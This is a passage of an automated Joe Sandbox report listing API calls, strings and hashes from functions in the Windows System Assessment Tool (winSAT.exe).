                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4104442557-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CurrentPriorityThread$ClassErrorLastObjectProcessSingleWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3692216418-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$ErrorFirmwareFreeLastProcessSystemTable
                                                                                                                                                                                              • String ID: BMSR
                                                                                                                                                                                              • API String ID: 3869690938-2095607670
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$ErrorFirmwareFreeLastProcessSystemTable
                                                                                                                                                                                              • String ID: BMSR
                                                                                                                                                                                              • API String ID: 3869690938-2095607670
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemFirmwareTable.KERNEL32(?,?,?,?,00000000,?,?,00000400,00007FF780FD92CF), ref: 00007FF780FDB743
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,00000400,00007FF780FD92CF), ref: 00007FF780FDB75E
                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,?,?,00000000,?,?,00000400,00007FF780FD92CF), ref: 00007FF780FDB7C6
                                                                                                                                                                                              • HeapFree.KERNEL32(?,?,?,?,00000000,?,?,00000400,00007FF780FD92CF), ref: 00007FF780FDB7DA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$ErrorFirmwareFreeLastProcessSystemTable
                                                                                                                                                                                              • String ID: BMSR
                                                                                                                                                                                              • API String ID: 3869690938-2095607670
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule$CriticalInitializeSection
                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                              • API String ID: 1351695566-2766056989
                                                                                                                                                                                              • Opcode ID: 39e3a0f571b844d2cc6073091d0d7022794c40353ce1d93e0298a0fd54517ee6
                                                                                                                                                                                              • Instruction ID: e831c1d4b0f62b71e7b575782309a8f3f0ae8c103310c56282c1face85cb2d35
                                                                                                                                                                                              • Opcode Fuzzy Hash: 39e3a0f571b844d2cc6073091d0d7022794c40353ce1d93e0298a0fd54517ee6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 13715936609B818AE700EF71E4043AE77B4FB45B6CF548239CE591B3A8DF789169C724
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$ErrorFirmwareFreeLastProcessSystemTable
                                                                                                                                                                                              • String ID: BMSR
                                                                                                                                                                                              • API String ID: 3869690938-2095607670
                                                                                                                                                                                              • Opcode ID: 1f3144977a68b95f1a5eb06a1c43a53725c816e5bb445a56a9994b85d34872ad
                                                                                                                                                                                              • Instruction ID: bb3b7ac1c7405d6b1a0399cbe1ae574af6930ac5b5df28d938ec89daa5a03a4e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f3144977a68b95f1a5eb06a1c43a53725c816e5bb445a56a9994b85d34872ad
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0951F562B0C682D2E610AF21E94827DEBA0BF45794FA4C131DE1E433D5EE38F986C710
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ResumeThread$ObjectSingleWait_beginthreadex
                                                                                                                                                                                              • String ID: base\winsat\exe\WinSATOp.h
                                                                                                                                                                                              • API String ID: 2423865506-1141357602
                                                                                                                                                                                              • Opcode ID: eb3a2edf79ba8b4b4177111bb82672b12e4ad478017cb0450fd2a16dd265b27a
                                                                                                                                                                                              • Instruction ID: e33ddac61ae55e95ad235033c2c671f8ff93f950408ce5c853156601fd56c744
                                                                                                                                                                                              • Opcode Fuzzy Hash: eb3a2edf79ba8b4b4177111bb82672b12e4ad478017cb0450fd2a16dd265b27a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7941D433609B4286EB11EF11D4486B8B761FB94BA4FA48235CA6E473D4DF39F481C750
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$CurrentDeleteDirectoryFile
                                                                                                                                                                                              • String ID: TempWinSAT*.*$WinSAT_Storage*.*$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1384586179-2937672210
                                                                                                                                                                                              • Opcode ID: d2d69fbc7dd97be8e17ac9269385d11ac2f116bd9115a1230a9e0af1de29ef6a
                                                                                                                                                                                              • Instruction ID: 37efbf014e7dcd0b9c331845a8824b4459deb0fcba95f2abad81563d6fa2211e
                                                                                                                                                                                              • Opcode Fuzzy Hash: d2d69fbc7dd97be8e17ac9269385d11ac2f116bd9115a1230a9e0af1de29ef6a
                                                                                                                                                                                              • Instruction Fuzzy Hash: D7314F32B19A4695EB10AF61D8446BC6760FF48B98F989231DE1D537D4DF38E842C3A0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow__uncaught_exceptionstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: s is null
                                                                                                                                                                                              • API String ID: 541657574-2156393446
                                                                                                                                                                                              • Opcode ID: 16fe2a6d43e0df51381a4fa468cf86348126c17c47c81dedc7f72812749f5f38
                                                                                                                                                                                              • Instruction ID: 140a5cdbd765b8c820449d462cd1cea91c66730bc44ff850473fdd5605f9ec17
                                                                                                                                                                                              • Opcode Fuzzy Hash: 16fe2a6d43e0df51381a4fa468cf86348126c17c47c81dedc7f72812749f5f38
                                                                                                                                                                                              • Instruction Fuzzy Hash: E5212961B1DA4681EF20FB26E4613B9A360BF807A4FF09231DA6E073D5DE1CE405C320
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD45
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD69
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: SetEndOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD8E
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDC1
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDDC
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: WriteFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE11
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE24
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE37
                                                                                                                                                                                                • Part of subcall function 00007FF780FCDC70: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE47
                                                                                                                                                                                                • Part of subcall function 00007FF780FCCF3C: EventRegister.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000035,00007FF780F9E9C1), ref: 00007FF780FCCF63
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00007FF780FCE1B1
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                              • SetCriticalSectionSpinCount.KERNEL32 ref: 00007FF780FCE1F5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CriticalEventSection$CountEnabled$BuffersCloseCreateCurrentEnterErrorFlushHandleLastLeaveLocalProcessRegisterSizeSpinTickTimeWrite_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: ERROR: Cannot Initilize ETW provider %s$base\winsat\exe\logging.cpp$log
                                                                                                                                                                                              • API String ID: 1492999411-3845554977
                                                                                                                                                                                              • Opcode ID: f596098e47200d1251045281062a3cda2fb09e0b4ebe28b3160109981f106ce1
                                                                                                                                                                                              • Instruction ID: 053088b523757586cad4bd2bd7835dc7ed934b39f15232bb51cf14a910502598
                                                                                                                                                                                              • Opcode Fuzzy Hash: f596098e47200d1251045281062a3cda2fb09e0b4ebe28b3160109981f106ce1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 98316F22A0C68292EA00BB61E8421F9E750FF82324FE49531E58D47BD6DF6CF905CB60
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 0-1001986530
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$memchrmemcpystd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: str is null
                                                                                                                                                                                              • API String ID: 2056636401-2182108151
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CancelWaitableTimer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF780F999D0), ref: 00007FF780FD5731
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CancelTimerWaitable
                                                                                                                                                                                              • String ID: Cannot cancel the assessment watch dog timer$Dying - Cannot cancel the assessment watch dog timer$base\winsat\exe\watchdog.cpp
                                                                                                                                                                                              • API String ID: 2866266559-70004805
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Event$Enabled$CountCurrentErrorLastProcessTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: Cancel event has been set.$ERROR: cannot set cancel event: %S$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1673490931-415747489
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$ClassDestroyHandleModuleUnregister
                                                                                                                                                                                              • String ID: DXBaseWndClass
                                                                                                                                                                                              • API String ID: 2062980464-1627930235
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                              • API String ID: 1480402491-1866435925
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memmove_s$ExceptionThrow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2739672242-0
                                                                                                                                                                                              • Opcode ID: 3fba23a301cc8c3eddab57c5273ec03d0a44ea304a795512a211ec270c906cf3
                                                                                                                                                                                              • Instruction ID: fe0440283739f694f645a39a284b00e89581bb648ee32aca6cc261fb9ee3db2c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fba23a301cc8c3eddab57c5273ec03d0a44ea304a795512a211ec270c906cf3
                                                                                                                                                                                              • Instruction Fuzzy Hash: BE71E362B19B8A86DE04DB56E908578E296FB44FD8BA99531CE2E07BC0DF7CF051C310
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
• Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memmove_s$ExceptionThrow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2739672242-0
                                                                                                                                                                                              • Opcode ID: b6b418e09d3768c06b4364c57f6690a10db974ced1ae4a904b1b914e5f3f3e5d
                                                                                                                                                                                              • Instruction ID: 38af729c2d0a29d0cb6e4138b76557cf7e745de44ef1774bdfdd4cd54ec90601
                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b418e09d3768c06b4364c57f6690a10db974ced1ae4a904b1b914e5f3f3e5d
                                                                                                                                                                                              • Instruction Fuzzy Hash: EF61AF21B19B5782EE28AB26A9150B8E791BF84BE4BA48531CE5E07BD0DF7DF505C310
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$ExceptionThrow
                                                                                                                                                                                              • String ID: ERROR: $cannot save assessment results$config$moobe
                                                                                                                                                                                              • API String ID: 3817088620-962671459
                                                                                                                                                                                              • Opcode ID: ef07d88d6789d606896970b21f26944f48c94aeef73d3e740e48e52cf08e4863
                                                                                                                                                                                              • Instruction ID: fa093c692c0b857e3ac4fb2447ab5f6968275d4cf39bc8439eb3e510a68632c4
                                                                                                                                                                                              • Opcode Fuzzy Hash: ef07d88d6789d606896970b21f26944f48c94aeef73d3e740e48e52cf08e4863
                                                                                                                                                                                              • Instruction Fuzzy Hash: E0817622A1CA4682EB10AB12D8402B9E7A0FF81B94FB49031EA5E57BD6DF7CF545C750
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$CurrentEnabledEnterEventLeaveThread_vsnwprintf_s
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3495192508-0
                                                                                                                                                                                              • Opcode ID: 3cf63db9f0e59f2383468d886ec8bcb73490454f5f6a3f8f9637a7fd78a6f077
                                                                                                                                                                                              • Instruction ID: 32bd3d08127df455a76e869d0a25d39afc5c1b7997a7bf50450b2227a0fd7a11
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cf63db9f0e59f2383468d886ec8bcb73490454f5f6a3f8f9637a7fd78a6f077
                                                                                                                                                                                              • Instruction Fuzzy Hash: C1514D32A1CB9286E720AF15F8412A9F7A0FB85760FA08535DA9D43BE4DF7CE445CB10
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$CurrentEnabledEnterEventLeaveThread_vsnwprintf_s
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3495192508-0
                                                                                                                                                                                              • Opcode ID: 65a7c28a3c581d82b51d6db7cb14b553ef75fe7dc15b4eb1b2a5e2d69983c850
                                                                                                                                                                                              • Instruction ID: 2472d509d875c6d13798e75f6807e15f1206b5c9dacb0d53d021eb1f9dee8dcc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 65a7c28a3c581d82b51d6db7cb14b553ef75fe7dc15b4eb1b2a5e2d69983c850
                                                                                                                                                                                              • Instruction Fuzzy Hash: 31516E32A18A8286E720AF55F841279F7A1FB85760FA48235DAAD477E4DF7CE405CB10
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ClassObject
                                                                                                                                                                                              • String ID: $base\winsat\exe\processresults.cpp
                                                                                                                                                                                              • API String ID: 1165159591-75052694
                                                                                                                                                                                              • Opcode ID: d7f3694650f63706994aba093e4ee3e8e277766314f2b333fb01905add428965
                                                                                                                                                                                              • Instruction ID: 4c6545838644e3bc0e0750a875a5c5d99d2498d44bc2775f256b53174b8cf4b8
                                                                                                                                                                                              • Opcode Fuzzy Hash: d7f3694650f63706994aba093e4ee3e8e277766314f2b333fb01905add428965
                                                                                                                                                                                              • Instruction Fuzzy Hash: E4419C22A0C61381EF54FB26D8513F8A360BF40BE8FA4A131E91E4A7D6DE6CF445D360
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780F97E4A
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780F97E61
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                                • Part of subcall function 00007FF780FA9C0C: __uncaught_exception.MSVCRT ref: 00007FF780FA9DE6
                                                                                                                                                                                                • Part of subcall function 00007FF780FA2944: __uncaught_exception.MSVCRT ref: 00007FF780FA2A2B
                                                                                                                                                                                                • Part of subcall function 00007FF780FA9904: __uncaught_exception.MSVCRT ref: 00007FF780FA9BB3
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$__uncaught_exception$EnabledEventExceptionThrow$CountCurrentFindHandleLoadLockModuleProcessSizeofTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: ERROR: $ERROR: can't create disk assessment command line: %S$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1437627868-237364375
                                                                                                                                                                                              • Opcode ID: 66356b93c4b9199996322b215f815dc2237bbf6a538ed612d1d23e7a547f123c
                                                                                                                                                                                              • Instruction ID: 828374e7a1994827b15a9e87866aa276c9a6dc318fd7b3b9ae35d5d5131329f8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 66356b93c4b9199996322b215f815dc2237bbf6a538ed612d1d23e7a547f123c
                                                                                                                                                                                              • Instruction Fuzzy Hash: A931A021B1DA4251EF20FB12E8513F9E360BF84764FE09231E55E467E6DE2CE546C720
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalDeleteErrorLastSection$CloseHandle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 36034308-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String___lc_codepage_func___lc_handle_func__crt__pctype_funcislower
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2887104122-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String___lc_codepage_func___lc_handle_func__crt__pctype_funcisupper
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3436188357-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC608
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC658
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC66C
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC6BA
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC508: GetProcessHeap.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC50C
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC508: HeapAlloc.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC526
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalHeapSection$AllocEnterErrorFileLastLeaveModuleNameProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2639094630-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseEventHandle$CreateObjectSingleWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3433744922-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide___lc_codepage_func___lc_handle_func___mb_cur_max_func_errno
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1734677270-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __pctype_func$___lc_codepage_func___lc_handle_funcmalloc
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3627676911-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC50C
                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC526
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC58B
                                                                                                                                                                                              • SetCriticalSectionSpinCount.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC59C
                                                                                                                                                                                              • SetCriticalSectionSpinCount.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC5B4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountCriticalHeapSectionSpin$AllocProcessmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2926470208-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$memcpy
                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                              • API String ID: 240754450-2852464175
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$memcpy
                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                              • API String ID: 240754450-2852464175
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: str is null
                                                                                                                                                                                              • API String ID: 1480402491-2182108151
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$FolderPath
                                                                                                                                                                                              • String ID: Performance\WinSAT\DataStore
                                                                                                                                                                                              • API String ID: 1383251882-1130088143
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
